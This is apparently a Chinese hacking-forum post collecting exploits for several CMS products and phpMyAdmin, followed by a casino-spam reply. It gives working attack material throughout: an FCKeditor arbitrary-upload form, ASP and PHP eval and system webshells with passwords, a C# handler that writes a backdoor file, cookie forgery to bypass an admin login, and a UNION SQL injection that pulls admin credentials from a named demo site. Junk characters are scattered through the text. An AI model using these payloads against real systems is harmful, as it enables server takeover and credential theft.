YxShop易想购物商城4.7.1版本任意文件上传漏洞" V* x! a9 z! i5 B% s+ ~/ E
* E7 z0 N7 ^  E* V' a
http://xxoo.com/controls/fckedit ... aspx/connector.aspx  w9 F) [, o2 Q- i/ I
跳转到网站根目录上传任意文件。$ Q% q- o/ R) l9 R8 C$ i
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
/ I: p( O; Y7 F<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
6 l7 p6 L& H0 ]% cUpload a new file:<br>
7 ?& ]+ h( H" b* H<input type="file" name="NewFile" size="50"><br>  m, y# y8 }  {0 J- h! }1 V3 E( w
<input id="btnUpload" type="submit" value="Upload">, t, p. s7 V0 F. h( E( D
</form>2 j' D. c6 s3 N' P( O
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------! [" X0 h" h0 X! R2 W4 m9 p
5 W3 N: D7 {+ S0 w, {  v
SDcms 后台拿webshell
8 O6 `( p" }6 H5 B4 y2 W8 J! t  Z6 [) }8 ~
第一种方法:
8 G$ }1 J$ T/ w8 e1 D( a8 [$ o' d! m进入后台-->系统管理-->系统设置-->系统设置->网站名称;/ B3 l; w: a+ E
把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx3 |- ~7 [/ L+ V4 U3 {
用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。( X5 r- D4 B1 C% i/ D4 S; T
第二种方法:
+ a# G- ?  Q7 \  C6 J! U1 ~6 o进入后台-->系统管理-->系统设置-->系统设置->上传设置;
. |) q% R  f% t7 o# t  Z在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
- q  T; \5 R4 |7 v# t第三种方法:; s& g2 w. T' t
进入后台-->界面管理-->模板文件管理-->创建文件
, x4 [! j2 j$ D' H' i$ ?文件名写入getshell.ashx/ r; ~& S- I7 x- w+ E& ~& ]& w
内容写入下面内容:1 K) a0 P) u6 b. ~+ n
/====================复制下面的=========================/
) l& I% z: C/ g, x8 _4 P" E<%@ WebHandler Language="C#" Class="Handler" %>0 ?: W% a2 M) A% |0 N' K
using System;
; @7 U  ]7 y6 K) o' a8 t0 F' H/ yusing System.Web;: q* _" ?' E6 A7 E5 Z( C# Y: l8 q
using System.IO;, g& d% |# V& `8 M. G
public class Handler : IHttpHandler {8 p: w$ ]4 X! F. o4 K3 F% n
public void ProcessRequest (HttpContext context) {$ a- C8 K7 f$ V, W
context.Response.ContentType = "text/plain";
" ~3 t9 \9 K  {- @StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
: k8 C, t+ _* Sfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
5 U5 V, o: A, N( E8 |2 j$ Q7 ]file1.Flush();
/ g  k4 q: z5 Q4 H1 S  Zfile1.Close();
0 f  h' Y$ a( N7 t) g0 J}
; m# I" p; o  U' b9 v$ c% ]public bool IsReusable {
8 e0 F; D2 g9 a$ p# P) \get {
. {* u" R+ F% T  ]( M0 K: zreturn false;- p3 b  s) y; j7 }+ i$ g
}
3 @2 \8 G7 I3 w6 |6 u; j}
5 G: O; U! l" D% u: L; ?2 G/ Z- Q$ f}
  W% X8 s+ v- Y1 ~: w  z9 j/=============================================/
& ^# V9 f' z4 K7 _& ]4 n1 I) ?2 o访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
* D0 q3 X  V, V* Y4 M; D会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
. h9 L2 t* r# b-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 i+ c3 k# V" H: N7 [+ W  ~( S) J
3 P  f. V! J5 y, S) U5 XESCMS网站管理系统0day
7 R- g4 F3 `# {$ w8 f, d1 g9 w# c+ A: D  y( P+ C
后台登陆验证是通过admin/check.asp实现的& \( e: L2 D, ^+ k
' ]( v& F: b' d% ?4 P( \- y
首先我们打开http://target.com/admin/es_index.html
! ]( U1 k  ?3 v. b! O; _然后在COOKIE结尾加上8 H6 Z0 p  {/ B7 f) P* K5 }
; ESCMS$_SP2=ES_admin=st0p;8 I# G3 z: t1 T# o' `; r; k
修改,然后刷新
- C/ h$ l; \' r; P7 j/ E$ r进后台了嘎..
! ^' ~- U3 U$ l) {6 j1 [& b) t然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
/ ~$ ]! D; }4 B+ {& k) Y$ v$ A' a  e) h& s6 {+ N
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
% h$ r. ]0 n4 V; a0 u9 ~5 k嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp' B& h1 z: E! ~/ w8 X7 d( ?) `
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..9 X( W4 p* \9 L( z
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了, V' q- |  ?5 z8 d) X" G
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" V" B3 g. v# b8 ~7 }" M& ~) `2 X6 Y1 B- ^7 z3 D( g' y
宁志网站管理系统后台无验证漏洞及修复
" I* K4 y6 `/ R& f  \& _
6 Z, T" Y* d3 M( Q& m1 A, M- w% U网上搜了一下,好像没有发布.如有雷同纯粹巧合!5 S6 H; B( h% x+ d& x! v) I/ A! d
官方网站:www.ningzhi.net8 M9 v& x5 C" `: L$ T( S
学校网站管理系统 V.2011版本 ' ~0 w! T9 H8 s9 y% {* X2 H% R$ B
http://down.chinaz.com/soft/29943.htm 9 o$ H7 R# s# P: f
其它版本(如:政府版等),自行下载.
3 K4 \+ o8 i) e4 Z& |漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~; S1 ?# [7 l. U1 c% G
login.asp代码如下:
4 k' P1 o: d; Z$ \9 Q) @<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> , p/ ~8 S& s/ J, C
manage.asp代码我就不帖出来了.反正也没验证.
, A! F: q5 \! ^只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!) h! t$ I/ k" \: o
漏洞利用:: O3 k8 x. ~! T( j  c% |! B$ Y
直接访问http://www.0855.tv/admin/manage.asp
; I* M, C2 [7 |9 z0 ~/ \$ d! z5 y数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web51 ]* d5 }9 b+ y& [, [6 l& z
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 E. ]; l3 a  q- H8 R8 k/ F5 W

  e% n6 e2 l* a1 bphpmyadmin拿shell的四种方法总结及修复
/ A1 K1 r, S$ ?9 r1 I1 `$ I# |+ p3 U; |6 L1 g# J0 y
方法一:+ m5 O: D" V$ b: |" B% a. H* ~
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );6 x8 W$ ], C* V0 Q- b7 b
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');& w& X. {9 |& n2 T- F6 X
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
* U8 H9 X" k) [7 \$ X----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
6 h8 p$ d1 i( F0 g: E% A4 l( ~    一句话连接密码:7on5 z; f7 I4 t( n4 Y, D. x
方法二:8 o5 E# M: J; x: ]; f, j
读取文件内容:    select load_file('E:/xamp/www/s.php');6 Q" q" H5 i% ?
写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'- o  j; g  E0 i. }8 ~
cmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
2 d: ?1 Y  J+ W方法三:2 x& R# i( x; G1 o( A
JhackJ版本 PHPmyadmin拿shell3 B5 F, ~6 K4 s
Create TABLE study (cmd text NOT NULL);
# c3 K! T3 ~- g6 y& AInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
3 p3 r" m9 I; r! `0 lselect cmd from study into outfile 'E:/wamp/www/7.php';7 V) q" u: O2 _7 I6 e
Drop TABLE IF EXISTS study;' q4 {1 k0 z( t$ }
<?php eval($_POST[cmd])?>
% B" f& ?1 U0 T1 F; h3 a  iCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
+ ~  G; S. S7 PINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1* G% B. G1 ~  @8 b# u+ \1 j* F
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1% ?. a& G% E* i1 Y# h! F
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。) }3 V. S0 D# V
方法四:/ y( u3 A: R0 C; B
select load_file('E:/xamp/www/study.php');, ]0 U% b, R0 q; ]' ~9 O: W
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'% f: ^6 \( A" _
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
% `( }( n% l% V* k-----------------------------------------------------------------------------------------------------------------------------------------------------------------------2 n1 b" T6 T& }- K6 a
6 k9 b) N; Z' R5 L4 C: M: y
NO.001中学网站管理系统 Build 110628 注入漏洞
0 @8 z& Q% V% P  \
, I- x' j9 M, M4 W+ G$ eNO.001中学网站管理系统功能模块:, ?9 @0 n$ j# G1 i; I
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等- b* F" i/ {* H% w+ x
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
- b. Q! G4 O7 y9 h) {6 D. M+ n6 V3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息3 r5 @% b/ h) ^" {6 \8 d$ c* ?2 c
4.视频图片管理:一级分类,动态添加视频或者图片等信息" C- `8 F/ J5 T5 ^6 r9 a: v
5.留言管理:对留言,修改,删除、回复等管理1 i. q: S/ G& i- C8 }5 c1 i
6.校友频道:包括校友资料excel导出、管理等功能
  p" Q" g1 q6 U% m; C5 }7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页, r2 ?0 p2 F& k' E" S( s2 a
默认后台:admin/login.asp
& e" D  B+ G; w6 t: ^2 G7 w, d; j官方演示:http://demo.001cms.net
; [0 g* k! Z: c  f/ ]" R- A, O( r源码下载地址:http://down.chinaz.com/soft/30187.htm
8 m2 r2 g( ^  t4 ~# wEXP:
1 j/ b& l6 e0 o: N# L2 munion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin, v! ]5 y9 @& s9 G. Y# v
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
4 x. u) m8 _  a3 C2 ]9 R$ D8 jgetshell:后台有备份,你懂的
8 @2 S# h9 p7 h0 g5 s6 G$ c另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
. C; m% t) n0 `+ ]) h6 F-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表